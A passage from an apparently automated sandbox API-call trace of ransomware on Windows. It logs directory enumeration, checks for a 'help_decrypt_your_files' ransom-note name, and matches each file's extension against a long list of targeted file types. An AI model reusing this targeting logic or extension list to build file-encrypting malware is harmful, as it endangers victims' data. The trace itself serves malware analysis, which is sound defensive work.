.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.890] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x59004aaf, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x59004aaf, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x59452ec7, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB_BASIC.16.1033.hxn", cAlternateFileName="MSSKYP~3.HXN")) returned 1
	[0177.890] lstrcmpW (lpString1="MS.SKYPEFB_BASIC.16.1033.hxn", lpString2="..") returned 1
	[0177.890] lstrcmpW (lpString1="MS.SKYPEFB_BASIC.16.1033.hxn", lpString2=".") returned 1
	[0177.890] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.890] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.SKYPEFB_BASIC.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_BASIC.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_BASIC.16.1033.hxn"
	[0177.891] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_BASIC.16.1033.hxn") returned 62
	[0177.891] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.891] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_BASIC.16.1033.hxn", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft help\\ms.skypefb_basic.16.1033.hxn") returned 0x3e
	[0177.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.891] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.skypefb_basic.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.891] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.skypefb_basic.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.skypefb_basic.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.skypefb_basic.16.1033.hxn"
	[0177.891] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.skypefb_basic.16.1033.hxn") returned 62
	[0177.891] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.892] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.892] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.892] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58ffe82d, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58ffe82d, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5944cd17, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB_ONLINE.16.1033.hxn", cAlternateFileName="MSSKYP~2.HXN")) returned 1
	[0177.892] lstrcmpW (lpString1="MS.SKYPEFB_ONLINE.16.1033.hxn", lpString2="..") returned 1
	[0177.893] lstrcmpW (lpString1="MS.SKYPEFB_ONLINE.16.1033.hxn", lpString2=".") returned 1
	[0177.893] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.893] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.SKYPEFB_ONLINE.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINE.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINE.16.1033.hxn"
	[0177.893] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINE.16.1033.hxn") returned 63
	[0177.893] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.893] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINE.16.1033.hxn", cchLength=0x3f | out: lpsz="c:\\users\\all users\\microsoft help\\ms.skypefb_online.16.1033.hxn") returned 0x3f
	[0177.893] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.893] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.skypefb_online.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.894] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.skypefb_online.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.skypefb_online.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.skypefb_online.16.1033.hxn"
	[0177.894] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.skypefb_online.16.1033.hxn") returned 63
	[0177.894] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.894] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.894] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.895] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x590098bc, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x590098bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x594aad1a, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB_ONLINEG.16.1033.hxn", cAlternateFileName="MSSKYP~4.HXN")) returned 1
	[0177.895] lstrcmpW (lpString1="MS.SKYPEFB_ONLINEG.16.1033.hxn", lpString2="..") returned 1
	[0177.895] lstrcmpW (lpString1="MS.SKYPEFB_ONLINEG.16.1033.hxn", lpString2=".") returned 1
	[0177.895] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
